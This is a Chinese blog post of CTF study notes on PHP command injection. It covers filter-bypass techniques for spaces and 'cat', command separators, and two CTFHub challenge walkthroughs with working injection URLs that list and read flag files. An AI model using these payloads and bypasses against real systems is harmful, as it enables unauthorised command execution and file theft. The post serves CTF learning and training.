ctf命令执行

最新推荐文章于 2024-05-29 10:00:00 发布
最新推荐文章于 2024-05-29 10:00:00 发布
阅读量695 收藏 4
点赞数 1
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46540840/article/details/115190119
版权

文章目录

前言

这里整理了一下基础题常用的过滤替代后续等深入学习时会再大幅不冲.
入门的话推荐ctfhub命令执行,上面有基础题适合小白入门比如还没入门的我wuwu…

当应用需要调用一些外部程序去处理内容时,会用到一些执行系统命令的函数。
如php中的system、exec、shell_exec等
当用户可以控制命令执行函数中的参数时,将可以注入 恶意系统命令到正常命令中,造成命令执行攻击
调用这些函数执行系统命令时,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有过滤用户输入的情况下,就会造成命令执行漏洞(这句很好直接搬)

一、知识要点

空格过滤替换品(常用为以下几个)

  1. %09(Tab键)
  2. I F S , IFS, IFS,IFS 9 , 9, 9,{IFS},$IFS
  3. < <> 重定向符

cat过滤替换品

  1. more:一页一页的显示内容(linux环境下文本内容太多可以分页显示
  2. less:与 more 类似
  3. tac:从最后一行开始显示,tac 是 cat 的反向显示
  4. nl:显示的时候,顺便输出行号

让命令得到回显用分割符

; //分号 | //只执行后面那条命令 || //只执行前面那条命令 & //两条命令都会执行 && //两条命令都会执行

命令执行函数(system和passthru函数会得到回显 其他要echo来得到输出

  1. system():同 C 版本的 system() 函数一样, 本函数执行 command 参数所指定的命令, 并且输出执行结果。

  2. passthru():只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。

  3. exec():不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。
    shell_exec():是PHP中的一个内置函数,用于通过shell执行命令并以字符串的形式返回完整的输出。

  4. 反引号 同shell_exec()

二、举栗子

1.CTFHub 技能树 综合过滤

ctfhub综合过滤

可以看到这里有一大串过滤 ~烦!!!😦

if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m))

常规思路传个ip:

?ip=127.0.0.1%0als

Array (
[0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes
[1] => flag_is_here
[2] => index.php )

可以看到flag字眼,用命令cd flag_is_here进入目录用%0a代替;用%09代替空格这里太多种了随便给出几种

?ip=127.0.0.1%0acd%09fl''ag_is_here%0als
?ip=127.0.0.1%0acd$IFSfl''ag_is_here%0als
?ip=127.0.0.1%0acd${IFS}fl''ag_is_here%0als
?ip=127.0.0.1%0acd${IFS}fl''ag_is_here%0als

结果为
在这里插入图片描述
看到有两个flag文件进入flag可以用cd%09fla*查看内容

http://challenge-1c380915c8009f61.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$>fl''ag_is_here%0als

然后就得到flag就行在这里插入图片描述

http://challenge-1c380915c8009f61.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd%09fl''ag_is_here%0aca''t%09fl''ag_17391581825778.php

查看源代码得到flag在这里插入图片描述

2.CTFHub 第一题

附上一道简单题
http://challenge-4d715212e9f37db2.sandbox.ctfhub.com:10080/?ip=1;ls

在这里插入图片描述

一看flag就在那一串数字里面 继续构造
查看源码得到flag 没有什么过滤最简单了:)

http://challenge-4d715212e9f37db2.sandbox.ctfhub.com:10080/?ip=1;cat 225432635120642.php

在这里插入图片描述

Rgylin
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF命令执行
afei001
03-29 639
练习环境     攻击机:kali     靶机:Ubuntu 17.04 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255.255.0 bro...
CTF-命令执行【超详细】
不知名白帽的博客
09-04 9650
CTF-命令执行【超详细】
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
最新发布
m0_61869253的博客
05-29 822
*创作初心:一切为了她座右铭:不要让时代的悲哀成为你的悲哀专研方向:web安全,后渗透技术****每日emo:**一、关键字绕过1、cat限制绕过2、$限制绕过3、点号限制绕过(2023.1.4)4、空格限制绕过5、php限制绕过二、另类变形写法1、eval双重参数覆盖(2022.12.31)2、include双重参数覆盖(2023.1.3)3、闭合双重参数绕过(2023.1.5)4、data伪协议配合include函数命令执行三、奇淫巧技思路。
CTF-命令执行
Luodehahajiang的博客
07-03 1736
ctf 命令执行 命令执行函数 命令执行绕过方法
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1698
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTF神器_ctf
09-23
3. **获取Webshell**:通过扫描找到可以写入的目录,上传恶意脚本,获取远程命令执行的通道。 4. **验证漏洞**:找到疑似漏洞后,使用Dirsearch验证它们是否真实有效。 5. **了解网站结构**:对于理解网站的架构和...
php突破命令限制执行系统命令
05-09
php突破命令限制执行系统命令 可以用于ctf 实战 等多领域使用 十分实用,可以用于突破system等命令被限制的时候
命令注入讲解ppt.pptx
08-10
命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞。 命令注入攻击最初被关注到,是 Shell 命令注入攻击(所以最初也被称为 Shell 命令注入攻击),由挪威一名程序员...
CTF AWD工具
10-07
在AWD场景下,参赛者可能需要控制目标服务器,蚁剑提供了一个方便的界面来执行命令、上传下载文件等操作,增强了攻击和防御的能力。 最后,"WebShellKill_Seay" 是一款专门用于检测和清除Webshell的工具。Webshell...
CTF命令执行RCE
qq_53099119的博客
04-02 2633
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
CTF中web命令执行知识点
cutesharkl的博客
07-08 691
命令注入:命令注入是一种常见的命令执行漏洞,攻击者可以通过将恶意命令注入到应用程序中的用户输入来执行系统命令命令执行的原理:命令执行漏洞通常发生在应用程序未正确过滤、验证或转义用户输入的情况下。输入验证与过滤:对于用户输入,应该进行必要的验证和过滤,以防止恶意输入进入命令执行函数。操作系统命令命令执行漏洞通常发生在应用程序中执行操作系统命令的函数上。绕过技巧:在实际的命令执行漏洞利用中,可能需要使用一些技巧来绕过安全机制。操作系统特定命令命令执行漏洞也可能与特定的操作系统相关。
CTF练习:HTTP服务之命令执行
qq_43233085的博客
12-05 483
CTF练习:HTTP服务之命令执行环境准备信息收集漏洞利用 靶机地址: 链接: https://pan.baidu.com/s/1axC2PaXqscbZKNpTq3dTkg 提取码: t8uz 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.91.88 ifconfig 查看靶机的IP,为172.19.91.8...
CTF之代码/命令执行
m0_62102520的博客
07-13 314
1.命令执行介绍 2.命令执行原理 3.代码执行介绍
ctfshow-命令执行
weixin_45794666的博客
12-19 4107
命令执行 反引号`` 反引号``即命令替换 是指Shell可以先执行``中的命令,将输出结果暂时保存,在适当的地方输出 单引号,双引号 适用条件:过滤了字符串 放在shell命令中,绕过正则匹配且不影响原意 空格绕过 > < <> 重定向符 %09(需要php环境) ${IFS} $IFS$9 {cat,flag.php} //用逗号实现了空格功能 %20 %09 读文件绕过(cat绕过) 适用条件:过滤了cat 1)more:一页一页的显示档案内容 (2)less:与 mor
CTF命令执行学习笔记
qq_42911487的博客
10-31 3038
CTF命令执行学习笔记 php常见的命令执行函数(这里只谈命令执行不涉及代码执行) system、popen、shell_exec、exec、passthru、反引号(比如echo ls;反引号实际是shell_exec的另一种形式) //通常以以下形式出现,题外话eval中可以直接闭合php标签另起一个php... <?php $a=$_GET[1]; //一些过滤 system($a); ?> 命令执行绕过空格 1.$IFS、$IFS$9、$IFS$@、$IFS$*等 在linux中IFS
CTF挑战:绕过过滤执行命令技巧解析
这使得攻击者无法直接看到命令执行的结果。在这种情况下,可以尝试使用命令分隔符,如分号(;)或逻辑或操作符(||),将多个命令写在一个payload中,使得第一个命令(导致无回显)被执行,而第二个命令(如输出flag...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值